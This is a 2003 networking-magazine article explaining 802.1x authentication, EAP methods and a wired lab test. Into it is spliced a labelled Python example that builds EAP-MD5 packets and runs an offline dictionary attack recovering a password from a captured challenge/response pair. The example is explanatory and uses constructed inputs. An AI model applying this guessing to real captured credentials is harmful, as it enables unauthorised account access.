Network + Systems Infrastructure
Workshop
The New Face of Authentication

May 15, 2003
By Dilip Advani


 
In this article: Introduction; Wirelessness; The Alphabet Soup of Authentication

The 802.1x standard was designed to provide port-based access control for wired LANs, but it has become the standard for wireless security as well: IEEE 802.11i and the Wi-Fi Alliance's WPA (Wi-Fi Protected Access) both use 802.1x for authentication and for distributing dynamic encryption keys. It's also beginning to replace static WEP (Wired Equivalent Privacy) keys and MAC (Media Access Control) address filters in WLANs because it scales and does a better job of keeping attackers out.

Aside from generating and distributing dynamic keys, the 802.1x standard lets the network rekey sessions regularly and monitors network access for accounting purposes. It authenticates user credentials, such as a user name and password or a digital certificate, rather than a hardware address, so if a laptop is stolen, for instance, the thief can be locked out of the network by disabling the user's account, something a MAC address filter can't do. It works with existing authentication systems, and it doesn't require custom software for each client.



The standard uses EAP (Extensible Authentication Protocol, RFC 2284) to carry the messages exchanged during authentication, and EAP in turn lets the two sides agree on which authentication method to use. Among the EAP methods in use are MD5 (MD5-Challenge), TLS (Transport Layer Security), TTLS (Tunneled TLS), LEAP (Lightweight EAP) and PEAP (Protected EAP); see "The Alphabet Soup of Authentication" for more on these methods.

But 802.1x is no silver bullet for ensuring users are who they say they are. The stronger EAP methods require digital-certificate management, which is complex, and the 802.1x client and server software must support the same EAP method. It's not yet plug and play, either, because several of the authentication methods are still immature.

Architecturally Speaking

The 802.1x protocol consists of three main elements. The supplicant is a client device, such as a desktop, laptop or PDA, that requires secure network access. Then there's the authenticator, an intermediary device such as a wireless access point or a network switch, which relays authentication messages between the supplicant and the authentication server, the third piece of 802.1x. The authentication server can be a RADIUS server that authenticates users against its own user database or against an external one, such as Microsoft's Active Directory or another LDAP directory.

RADIUS servers are a popular choice for the 802.1x authentication server because most enterprises already use them for secure dial-in user access. With a RADIUS server, you avoid storing user information on each access point or network switch. It also helps with redundancy: a backup RADIUS server can take over the authentication process if the primary server fails. Because RADIUS carries EAP messages transparently (RFC 2869), a RADIUS server can support most of the commonly used EAP methods, such as TLS, TTLS, LEAP, MD5 and PEAP.

For a SOHO wireless environment where it's not feasible to set up a RADIUS server for 802.1x, an administrator at the office or a user working from home can instead use a preshared key entered manually on both the client and the access point. The access point then generates the WEP session key and delivers it to the wireless client protected by the preshared key, so no authentication server is involved. The catch is that the preshared key is the only secret: anyone who knows or guesses it can join the network, so it must be long and random, and it must be changed whenever someone who knows it leaves.

All Wired

Organizations deploying 802.1x can authenticate their users to the LAN with a user name-password combination or stronger authentication. 802.1x authentication is widely available from big-name switch vendors, including Alcatel, Cisco Systems, Enterasys Networks, Extreme Networks and Foundry Networks. When a switch--the authenticator--detects an active client at the other end of the link in an 802.1x-enabled port, it initiates the 802.1x authentication process.

We recently tested 802.1x security on a wired Ethernet LAN in Network Computing's Real-World Labs® at Syracuse University. A Foundry Networks FastIron 4802 switch was the 802.1x authenticator, and the authentication server was a Microsoft Windows 2000 Advanced Server with Internet Authentication Services (IAS). On the IAS server, we registered the Foundry switch as a client device and set the remote-access policy to allow network access only during normal business hours.

We used EAP-MD5 as our authentication method. EAP-MD5 is a CHAP-style challenge-response: the server sends a random challenge, the client returns a one-way MD5 hash computed over the shared secret (the password) and the challenge, and the server recomputes the hash to verify the supplicant's credentials. It's the simplest method to use in the 802.1x world. However, it's not the method of choice on the wireless side: it authenticates only the client, not the server, so a rogue wireless AP (access point) can pose as the network and harvest challenge-response pairs for offline password guessing, and it produces no keying material, so it can't be used to hand out dynamic WEP keys.
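To make concrete what the EAP-MD5 exchange described above actually does, and why it authenticates only the client, here is an added example (not code from the article or from any of the products tested) that builds the MD5-Challenge Request and Response packets from RFC 2284, verifies the Response the way an authentication server would, and then runs the offline password-guessing attack that an eavesdropper or a rogue access point could mount against a captured exchange. The user name, password, challenge bytes, server name and wordlist are all constructed for the example.

```python
"""EAP-MD5 (MD5-Challenge, EAP type 4) request/response, verification and the
offline guessing attack it permits. Added example; constructed inputs only."""
import hashlib
import hmac
import struct

EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_MD5_CHALLENGE = 4  # RFC 2284 section 5.4


def eap_packet(code: int, identifier: int, type_data: bytes) -> bytes:
    """EAP header: Code(1) Identifier(1) Length(2) Type(1), then Type-Data."""
    length = 4 + 1 + len(type_data)
    return struct.pack("!BBHB", code, identifier, length, EAP_TYPE_MD5_CHALLENGE) + type_data


def md5_challenge_request(identifier: int, challenge: bytes, server_name: bytes = b"") -> bytes:
    """Authenticator -> supplicant: Value-Size(1), Value (the challenge), Name."""
    return eap_packet(EAP_REQUEST, identifier, bytes([len(challenge)]) + challenge + server_name)


def md5_response_value(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """CHAP/MD5 response (RFC 1994): MD5 over Identifier || secret || challenge."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def md5_challenge_response(identifier: int, password: bytes, challenge: bytes, user_name: bytes) -> bytes:
    """Supplicant -> authenticator: Value-Size(1), Value (the hash), Name (user)."""
    value = md5_response_value(identifier, password, challenge)
    return eap_packet(EAP_RESPONSE, identifier, bytes([len(value)]) + value + user_name)


def parse_md5_type_data(packet: bytes):
    """Return (code, identifier, value, name) from an MD5-Challenge packet."""
    code, identifier, length, eap_type = struct.unpack("!BBHB", packet[:5])
    if eap_type != EAP_TYPE_MD5_CHALLENGE or length != len(packet):
        raise ValueError("not a well-formed MD5-Challenge packet")
    value_size = packet[5]
    value = packet[6:6 + value_size]
    name = packet[6 + value_size:]
    return code, identifier, value, name


def server_verify(response_packet: bytes, challenge: bytes, user_db: dict) -> bool:
    """What the authentication server does: recompute the hash and compare."""
    code, identifier, value, name = parse_md5_type_data(response_packet)
    if code != EAP_RESPONSE:
        return False
    password = user_db.get(name)
    if password is None:
        return False
    expected = md5_response_value(identifier, password, challenge)
    return hmac.compare_digest(expected, value)


def offline_guess(identifier: int, challenge: bytes, captured_value: bytes, wordlist):
    """The attack: one observed (or self-issued) challenge/response pair lets an
    attacker test password guesses offline, with no further network traffic."""
    for guess in wordlist:
        if md5_response_value(identifier, guess, challenge) == captured_value:
            return guess
    return None


def demo():
    user_db = {b"dadvani": b"winter2003"}  # constructed user database
    identifier = 7
    # Constructed challenge; a real authenticator would use os.urandom(16).
    challenge = bytes.fromhex("00112233445566778899aabbccddeeff")
    request = md5_challenge_request(identifier, challenge, b"ias.example")  # constructed server name

    # Nothing in the Request proves who sent it, so the supplicant answers a
    # rogue AP's challenge exactly as it would the real switch's.
    _, ident, chal, _ = parse_md5_type_data(request)
    response = md5_challenge_response(ident, user_db[b"dadvani"], chal, b"dadvani")
    accepted = server_verify(response, challenge, user_db)

    # An eavesdropper (or the rogue AP itself) now holds challenge + response.
    _, _, captured_value, _ = parse_md5_type_data(response)
    recovered = offline_guess(identifier, challenge, captured_value,
                              [b"password", b"summer2003", b"winter2003"])  # constructed wordlist
    return accepted, recovered


if __name__ == "__main__":
    ok, pw = demo()
    print("server accepted response:", ok)
    print("password recovered offline:", pw)
```

The legitimate server accepts the response, but so does the attack succeed: because the method never authenticates the network to the client and leaks a hash of the password to whoever issues the challenge, its security on an open medium is no better than the guessability of the password. That is why it is acceptable on a physically controlled switch port but not for wireless.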

802.1x was disabled by default on all of the Foundry switch's ports, so we used the switch's command-line interface to enable 802.1x authentication on the ports connected to 802.1x clients.

We also activated 802.1x on the Windows XP client and set the 802.1x port-control mode on the Foundry switch to auto, so the port passes nothing but EAP traffic until authentication succeeds. When the Windows XP client with EAP-MD5 connects to the port, 802.1x prompts the user for a user name and password before granting network access. In all, our lab test demonstrated that wired 802.1x is easy to deploy and configure, and that it works well with existing security solutions such as ACLs (access-control lists) and VLANs (virtual LANs).


